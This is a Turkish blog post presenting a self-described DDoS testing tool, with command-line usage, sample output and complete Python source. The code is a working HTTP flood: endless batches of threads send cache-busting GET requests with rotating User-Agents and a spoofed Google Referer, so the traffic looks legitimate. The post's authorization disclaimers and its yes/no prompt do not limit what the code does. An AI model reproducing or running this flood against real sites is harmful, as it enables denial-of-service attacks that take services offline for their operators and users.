Skip to content

DDoS Testing Tool

Featured image for DDoS Testing Tool
Mar 23, 2025
security penetration testing web security

DDoS Testing Tool

Deneme amaçlı oluşturduğum ve geliştirdiğim bir DDoS test aracı. Sadece eğitim amaçlı kullanım için uygundur.

Amaç ve Etik

Bu araç açıkça SADECE GÜVENLİK TESTİ İÇİN geliştirilmiştir. Bu veya benzer bir aracı kullanmadan önce şunları yapmalısınız:

  1. Sistem sahibinden açık izin almış olmak
  2. Yasal çerçeve içinde testler yürütmek
  3. Sorumlu açıklama ilkelerini takip etmek
  4. Üretim sistemlerine zarar vermekten kaçınmak

Nasıl Çalışır

Web test aracı, web uygulamalarının artan trafiği nasıl ele aldığını test etmek için meşru görünen HTTP istekleri oluşturur. Güvenlik profesyonellerine şu konularda yardımcı olur:

  • Web altyapısındaki potansiyel darboğazları belirleme
  • Yük dengeleme etkinliğini test etme
  • Yük devretme mekanizmalarını doğrulama
  • Stres altında uygulama yanıtını ölçme

Temel Özellikler

  • Çok iş parçacıklı tasarım: Verimli bir şekilde paralel istekler oluşturur
  • Özelleştirilebilir kullanıcı ajanları: Varsayılan listeyi kullanabilir veya ua.txt’den yükleyebilir
  • Detaylı yanıt analizi: Durum kodlarını, başlıkları ve yanıt boyutlarını gösterir
  • Yönlendirme takibi: Yapılandırılabilir bir limite kadar HTTP yönlendirmelerini otomatik olarak takip eder
  • Kapsamlı raporlama: Saniyedeki istekler ve yanıt bilgileri hakkında gerçek zamanlı istatistikler

Teknik Uygulama

Araç Python ile oluşturulmuştur ve birkaç güçlü kütüphane kullanır:

  • http.client: Düşük seviyeli HTTP bağlantıları için
  • threading: Paralel istek işleme için
  • urllib.parse: Uygun URL işleme için
  • requests/colorama/termcolor: Okunabilir, renkli kodlanmış çıktı için

Komut Satırı Argümanları

./webtester -d [hedef] -T [iş parçacığı sayısı] -Request

Seçenekler:

  • -d <ip|alan adı>: Hedefinizi belirtin (gerekli)
  • -t <float>: Soket zaman aşımını ayarlayın (varsayılan: 5.0)
  • -T <int>: İş parçacığı sayısını ayarlayın (varsayılan: 100)
  • -Request: İstek hedefini etkinleştirin (gerekli)

Örnek Kullanım Senaryosu

Bir güvenlik ekibi, test ortamında yeni bir web uygulaması dağıtımını test etmek için bu aracı kullanabilir. İstek yükünü kademeli olarak artırarak şunları belirleyebilirler:

  1. Performansın ne zaman düşmeye başladığı
  2. Otomatik ölçeklendirme politikalarının ne kadar iyi çalıştığı
  3. Mimarilerinde herhangi bir darboğaz olup olmadığı
  4. İzleme sistemlerinin artan yük üzerine düzgün şekilde uyarı verip vermediği

Çıktı Analizi

Bir test sırasında, her istek hakkında detaylı bilgi göreceksiniz:

[*] example.com/api/test?randomstring adresine GET isteği gönderiliyor
[+] İstek 1 başarılı: 200 OK
    Yanıt Başlıkları:
    Content-Type: application/json
    Content-Length: 1024
    Server: nginx/1.18.0
    Yanıt Boyutu: 1024 bayt

Başarısız istekler veya sunucu hataları açıkça vurgulanır:

[!] İstek 47 sunucu hatası: 503 Service Unavailable
    Yanıt Başlıkları:
    Retry-After: 30
    Content-Type: text/html
    Yanıt Boyutu: 287 bayt

Kurulum

Araç otomatik olarak gerekli bağımlılıkları kontrol eder ve yükler. Hem Windows hem de UNIX tabanlı sistemlerde çalışır.

Kod

İşte web test aracının uygulaması:

#!/usr/bin/env python3

version = '1.0'
title = '''
 Web Testing Tool | For authorized security testing only
 Version: ''' + version + '''

'''

import os
import sys
import time
import string
import signal
import http.client
import urllib.parse
import socket

from socket import gethostbyname
from random import choice, randint
from threading import Thread, Lock
from argparse import ArgumentParser, RawTextHelpFormatter

try:
    import requests, colorama
    from termcolor import colored, cprint
except ImportError:
    print("Installing required modules...")
    import os
    if os.name == 'posix':
        os.system('pip3 install colorama termcolor requests')
    elif os.name == 'nt':
        os.system('pip install colorama requests termcolor')
    print("Please restart the script.")
    sys.exit(0)

if os.name == 'nt':
    colorama.init()

signal.signal(signal.SIGFPE, signal.SIG_DFL)

def check_tgt(args):
    tgt = args.d
    try:
        ip = gethostbyname(tgt)
    except:
        sys.exit(cprint('[-] Can\'t resolve host: Unknown host!', 'red'))
    return ip

def add_useragent():
    uagents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36",
        "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36",
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15"
    ]
    try:
        with open("./ua.txt", "r") as fp:
            custom_agents = [line.strip() for line in fp if line.strip()]
            if custom_agents:
                uagents.extend(custom_agents)
    except FileNotFoundError:
        cprint('[-] No file named \'ua.txt\', using default User-Agents', 'yellow')

    return uagents

class Requester(Thread):
    def __init__(self, tgt):
        Thread.__init__(self)
        self.tgt = tgt
        self.port = None
        self.ssl = False
        self.req = []
        self.lock = Lock()
        self.success_count = 0
        self.follow_redirects = True

        if not tgt.startswith(('http://', 'https://')):
            tgt = 'http://' + tgt

        url_type = urllib.parse.urlparse(tgt)
        self.target_host = url_type.netloc
        self.target_path = url_type.path if url_type.path else '/'

        if not self.target_host:
            self.target_host = url_type.path
            self.target_path = '/'

        try:
            gethostbyname(self.target_host)
        except Exception as e:
            print(colored(f"[-] DNS resolution failed for {self.target_host}: {str(e)}", 'red'))
            return

        if url_type.scheme == 'https':
            self.ssl = True
            if self.ssl:
                self.port = 443
        else:
            self.port = 80

    def header(self):
        cachetype = ['no-cache', 'no-store', 'max-age='+str(randint(0, 10)), 'max-stale='+str(randint(0, 100)),
                     'min-fresh='+str(randint(0, 10)), 'notransform', 'only-if-cache']
        acceptEc = ['compress,gzip', '', '*', 'compress;q=0,5, gzip;q=1.0', 'gzip;q=1.0, indentity; q=0.5, *;q=0']
        acceptC = ['ISO-8859-1', 'utf-8', 'Windows-1251', 'ISO-8859-2', 'ISO-8859-15']

        http_header = {
            'User-Agent': choice(add_useragent()),
            'Cache-Control': choice(cachetype),
            'Accept-Encoding': choice(acceptEc),
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Keep-Alive': '42',
            'Host': self.target_host,
            'Referer': 'http://www.google.com'
        }
        return http_header

    def rand_str(self):
        mystr = []
        for x in range(3):
            chars = tuple(string.ascii_letters + string.digits)
            text = (choice(chars) for _ in range(randint(7, 14)))
            text = ''.join(text)
            mystr.append(text)
        return '&'.join(mystr)

    def create_url(self):
        return self.target_path + '?' + self.rand_str()

    def follow_redirect(self, response):
        """Handle a redirect response by getting the new location"""
        redirect_location = response.getheader('Location')
        if not redirect_location:
            return None, None, None

        if redirect_location.startswith('/'):
            new_host = self.target_host
            new_path = redirect_location
            new_ssl = self.ssl
        else:
            parsed = urllib.parse.urlparse(redirect_location)
            new_host = parsed.netloc or self.target_host
            new_path = parsed.path or '/'
            new_ssl = parsed.scheme == 'https'

        return new_host, new_path, new_ssl

    def run(self):
        if not hasattr(self, 'target_host') or not self.target_host:
            return

        redirect_count = 0
        max_redirects = 5  # Limit redirects to prevent infinite loops
        current_host = self.target_host
        current_path = self.target_path
        current_ssl = self.ssl

        try:
            while redirect_count <= max_redirects:
                if current_ssl:
                    conn = http.client.HTTPSConnection(current_host, 443, timeout=5)
                else:
                    conn = http.client.HTTPConnection(current_host, 80, timeout=5)

                self.req.append(conn)

                query = self.rand_str()
                url = current_path + '?' + query if '?' not in current_path else current_path + '&' + query

                http_header = self.header()
                http_header['Host'] = current_host

                method = "GET"

                with self.lock:
                    if redirect_count == 0:
                        print(colored(f"[*] Sending {method} request to {current_host}{url}", 'cyan'))
                    else:
                        print(colored(f"[*] Following redirect ({redirect_count}/{max_redirects}) to {current_host}{url}", 'cyan'))

                conn.request(method, url, None, http_header)

                response = conn.getresponse()
                status = response.status

                with self.lock:
                    self.success_count += 1

                    if status in (301, 302, 303, 307, 308):  # Redirect status codes
                        redirect_location = response.getheader('Location', 'No location header')
                        cprint(f"[*] Request {self.success_count} redirect: {status} {response.reason} -> {redirect_location}", 'blue')

                        if self.follow_redirects:
                            response.read()

                            new_host, new_path, new_ssl = self.follow_redirect(response)
                            if new_host and new_path is not None and new_ssl is not None:
                                redirect_count += 1
                                current_host = new_host
                                current_path = new_path
                                current_ssl = new_ssl

                                conn.close()
                                continue
                            else:
                                cprint(f"[!] Failed to extract redirect location", 'yellow')
                        break

                    elif status >= 200 and status < 400:
                        cprint(f"[+] Request {self.success_count} successful: {status} {response.reason}", 'green')
                    elif status == 405:
                        cprint(f"[!] Request {self.success_count} method not allowed: {status} {response.reason}", 'yellow')
                    elif status >= 400 and status < 500:
                        cprint(f"[!] Request {self.success_count} client error: {status} {response.reason}", 'yellow')
                    elif status >= 500:
                        cprint(f"[!] Request {self.success_count} server error: {status} {response.reason}", 'red')
                    else:
                        cprint(f"[?] Request {self.success_count} unknown response: {status} {response.reason}", 'cyan')

                    headers = [f"    {h}: {v}" for h, v in response.getheaders()]
                    if headers:
                        cprint("    Response Headers:", 'cyan')
                        for header in headers:
                            cprint(header, 'cyan')

                    response_body = response.read()
                    content_length = len(response_body)
                    cprint(f"    Response Size: {content_length} bytes", 'cyan')

                break

        except KeyboardInterrupt:
            sys.exit(cprint('[-] Canceled by user', 'red'))
        except Exception as e:
            with self.lock:
                cprint(f"[-] Request failed: {str(e)}", 'red')
        finally:
            self.closeConnections()

    def closeConnections(self):
        for conn in self.req:
            try:
                conn.close()
            except:
                pass

def main():
    parser = ArgumentParser(
        usage='./%(prog)s -t [target] -T [number threads]',
        formatter_class=RawTextHelpFormatter,
        prog='webtester',
        description=cprint(title, 'white', attrs=['bold']),
        epilog='''
Example:
    ./%(prog)s -d www.example.com -T 100 -Request
'''
    )
    options = parser.add_argument_group('options', '')
    options.add_argument('-d', metavar='<ip|domain>', default=False, help='Specify your target such an ip or domain name')
    options.add_argument('-t', metavar='<float>', default=5.0, help='Set timeout for socket')
    options.add_argument('-T', metavar='<int>', default=100, help='Set threads number for connection (default = 100)')
    options.add_argument('-Request', action='store_true', help='Enable request target')
    args = parser.parse_args()

    if not args.d:
        parser.print_help()
        sys.exit()

    add_useragent()

    if args.d:
        check_tgt(args)

    if args.Request:
        tgt = args.d
        print(colored('[*] Start sending requests to: ', 'blue') + colored(tgt, 'red'))

        try:
            if not tgt.startswith(('http://', 'https://')):
                host = tgt
            else:
                host = urllib.parse.urlparse(tgt).netloc

            if not host:
                host = tgt.replace('http://', '').replace('https://', '')

            ip = gethostbyname(host)
            print(colored(f"[+] Target {host} resolved to {ip}", 'green'))
        except Exception as e:
            sys.exit(cprint(f"[-] Cannot resolve target host {tgt}: {str(e)}", 'red'))

        total_requests = 0
        start_time = time.time()

        try:
            while True:
                current_threads = []
                for x in range(int(args.T)):
                    t = Requester(tgt)
                    t.daemon = True
                    t.start()
                    current_threads.append(t)
                    total_requests += 1

                for t in current_threads:
                    t.join()

                elapsed = time.time() - start_time
                requests_per_second = total_requests / elapsed if elapsed > 0 else 0
                print(colored(f"[*] Progress: {total_requests} total requests sent, {requests_per_second:.2f} req/sec", 'blue'))

        except KeyboardInterrupt:
            elapsed = time.time() - start_time
            requests_per_second = total_requests / elapsed if elapsed > 0 else 0
            print(colored(f"\n[*] Summary: {total_requests} total requests sent in {elapsed:.2f} seconds ({requests_per_second:.2f} req/sec)", 'green'))
            sys.exit(cprint('[-] Canceled by user', 'red'))
    else:
        parser.print_help()
        print()
        sys.exit(cprint('[-] You must choose request type', 'red'))

if __name__ == '__main__':
    try:
        import pyfiglet
        from termcolor import colored, cprint
        from tqdm import tqdm
        import time
        import sys
        import os

        os.system('cls' if os.name == 'nt' else 'clear')

        banner_text = pyfiglet.figlet_format("aliyilmaz.co", font="slant")
        for line in banner_text.split('\n'):
            print(colored(line, 'cyan', attrs=['bold']))
            time.sleep(0.1)

        print("\n" + "="*70)

        disclaimer = [
            "█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█",
            "█                       DISCLAIMER                    █",
            "█                                                     █",
            "█  This tool is for AUTHORIZED SECURITY TESTING ONLY. █",
            "█  You MUST have permission to test the target system.█",
            "█                                                     █",
            "█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█"
        ]

        for line in disclaimer:
            if "DISCLAIMER" in line:
                print(colored(line, 'red', attrs=['bold']))
            elif "AUTHORIZED" in line or "permission" in line:
                print(colored(line, 'yellow', attrs=['bold']))
            else:
                print(colored(line, 'white'))
            time.sleep(0.1)

        print("\n" + "="*70 + "\n")

        print(colored("Initializing security modules...", 'blue'))
        for _ in tqdm(range(100), desc="Loading", bar_format="{l_bar}{bar}| {n_fmt}/{total_fmt}", colour="green"):
            time.sleep(0.01)

        print("\n")

        proceed = input(colored("» Do you have authorization to test this system? (yes/no): ", 'green', attrs=['bold']))

        if proceed.lower() != "yes":
            print("\n" + colored("⚠ UNAUTHORIZED ACCESS ATTEMPT DETECTED", 'red', attrs=['bold', 'blink']))
            time.sleep(1)
            print(colored("⚠ System shutdown initiated...", 'red', attrs=['bold']))

            for i in range(5, 0, -1):
                sys.stdout.write(colored(f"\r⚠ Exiting in {i} seconds...", 'red', attrs=['bold']))
                sys.stdout.flush()
                time.sleep(1)

            sys.exit(0)

        print("\n" + colored("✓ Authorization confirmed. Starting security assessment...", 'green', attrs=['bold']))
        time.sleep(1)

        print("\n" + "="*70 + "\n")
        main()

    except ImportError as e:
        print(f"Missing required package: {e}")
        print("Please install required packages: pip install pyfiglet termcolor tqdm")
        sys.exit(1)
    except KeyboardInterrupt:
        print("\nOperation cancelled by user.")
        sys.exit(0)
    except Exception as e:
        print(f"An unexpected error occurred: {e}")
        sys.exit(1)

Unutmayın: büyük güç, büyük sorumluluk gerektirir. Güvenlik test araçlarını etik ve yasal olarak kullanın.